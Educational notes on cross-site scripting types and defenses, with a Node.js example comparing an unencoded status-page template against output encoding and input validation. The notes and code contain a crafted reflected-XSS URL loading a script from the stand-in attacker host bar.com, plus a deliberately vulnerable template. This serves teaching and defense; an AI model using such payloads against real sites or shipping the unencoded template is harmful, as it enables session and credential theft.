Cross-Site Scripting (XSS)
Cross-site scripting (XSS) is an attack in which a malicious script, hosted on the attacker’s site or coded into a link, is injected into a trusted site in order to compromise clients browsing that trusted site, circumventing the browser’s security model of trusted zones.
- leverages the access a current user has to a website
- uses this access to
  - carry out actions the user has the capability to perform
  - and/or access the current user’s data
- attacker will make a vulnerable website send malicious code to the victim’s browser
- performs any action the user is able to complete in the web app
  - read protected data within the web app
  - capture login credentials
  - push malware to the web application
Types of XSS
Reflected XSS
Reflected XSS is an attack where the malicious input comes from a crafted link.
- aka nonpersistent XSS
- the attack “bounces” off the web server when the link is clicked
- attack proceeds as follows:
  - The attacker identifies an input validation vulnerability in the trusted site.
  - The attacker crafts a URL to perform a code injection against the trusted site.
    - could be coded in:
      - a link from the attacker’s site to the trusted site
      - a link in an email message
  - When the user clicks the link, the trusted site returns a page containing the malicious code injected by the attacker.
    - browser is likely to be configured to allow the site to run scripts
    - so the malicious code will execute
- malicious code runs in the client’s browser with the same permission level as the trusted site
- the malicious script is not stored on the server; instead, a link carrying the malicious script is reflected off the server and executes in the victim’s browser when clicked
- defend with output encoding
Reflected XSS Example
attacker may send a well-crafted URL to the victim that, when clicked, is submitted to the web server and reflected back:
https://www.foo.com/status?message=<script src=https://bar.com/attackscript.js></script>
- makes the foo.com web server push the attackscript.js file, hosted on the attacker’s website bar.com, to the victim’s browser
- where it would be executed and perform whatever tasks it was designed to perform
Persistent XSS
A persistent XSS attack aims to insert code into a back-end database or content management system used by the trusted site.
- aka stored XSS
- occurs when malicious code is injected into a web application’s database
  - is then executed by all future visitors who view the infected page
- malicious code is stored in the web application’s database and executed when a user accesses the affected page
- particularly dangerous because it can:
  - steal sensitive user information
    - login credentials, financial data
  - be used to gain unauthorized access to a web application’s database
- prevent by implementing proper input validation and sanitization
Stored XSS Example
- attacker might leave a comment containing the attack script in the comments section of an entry on a blog
- people visiting the web page with their browsers would execute the attack
Client-side Scripts
A client-side script attack exploits vulnerabilities in client-side scripts.
- e.g., in how they manipulate the Document Object Model (DOM)
- attackers send malicious scripts to a web app’s client-side implementation of JavaScript to execute their attack solely on the client
Info
DOM-based cross-site scripting (XSS) occurs when a web application’s client-side script manipulates the Document Object Model (DOM) of a webpage using attacker-controlled data.
- Unlike other forms of XSS that exploit server-side vulnerabilities, DOM-based XSS attacks target the client-side environment, allowing an attacker to inject malicious script code that executes within the user’s browser in the context of the targeted webpage.
Mitigation
- details and best-practice defenses for XSS attacks are available from OWASP at https://owasp.org/www-community/attacks/xss/
- primary defense is output encoding
  - ensures user input displayed on a web page is treated as data rather than executable code
  - prevents execution of malicious scripts
- defend with input validation
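As an added example (not from the original notes), the following Node.js snippet models the foo.com status page from the Reflected XSS Example above. The vulnerable template concatenates the message parameter straight into the page, the hardened template applies the output encoding this section names as the primary defense, and a validation check provides the second layer. Only the crafted URL comes from the notes; the template, function names and checks are assumptions for illustration.

```javascript
// Added example (not from the original notes): a tiny status-page template that
// reflects the `message` query parameter, first as the unencoded string
// concatenation the notes describe, then with HTML output encoding applied.
// The crafted URL reuses the hosts and script name from the notes' example;
// the template, function names and checks are constructed for illustration.

// Output encoding for the HTML text context: replace the five characters that
// can alter document structure with their entity equivalents.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

function encodeForHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Extract the `message` parameter the way a server-side handler would.
// URL decoding happens here, so the result is the raw text the link carried.
function messageFromUrl(url) {
  return new URL(url).searchParams.get('message') ?? '';
}

// Vulnerable rendering: untrusted input is concatenated directly into markup,
// so a <script> element in the input becomes a <script> element in the page.
function renderStatusVulnerable(message) {
  return `<p class="status">${message}</p>`;
}

// Hardened rendering: same template, but the input is encoded first so the
// browser displays it as text instead of parsing it as markup.
function renderStatusEncoded(message) {
  return `<p class="status">${encodeForHtml(message)}</p>`;
}

// Input validation as a second layer (the notes' other recommended defense):
// a status message is short plain text, so anything containing markup
// delimiters is rejected before it reaches storage or the template.
function isValidStatusMessage(message) {
  return typeof message === 'string'
    && message.length > 0
    && message.length <= 140
    && !/[<>]/.test(message);
}

// Detection check for a test harness or response review: did the rendered
// page end up with a <script> element the template itself never emitted?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The crafted link from the notes' Reflected XSS Example section.
const CRAFTED_URL =
  'https://www.foo.com/status?message=<script src=https://bar.com/attackscript.js></script>';

// Run the crafted link through both templates and the validator.
function demo() {
  const message = messageFromUrl(CRAFTED_URL);
  const results = {
    vulnerableInjectsScript: containsScriptTag(renderStatusVulnerable(message)),
    encodedInjectsScript: containsScriptTag(renderStatusEncoded(message)),
    validationRejects: !isValidStatusMessage(message),
    encodedHtml: renderStatusEncoded(message),
  };
  console.log(results);
  return results;
}

demo();
```

The same principle covers the stored and DOM-based variants described above: a blog comment pulled from the database goes through the same encoding before rendering, and client-side code writes untrusted data to the page with `textContent` rather than `innerHTML`, so the browser never parses it as markup.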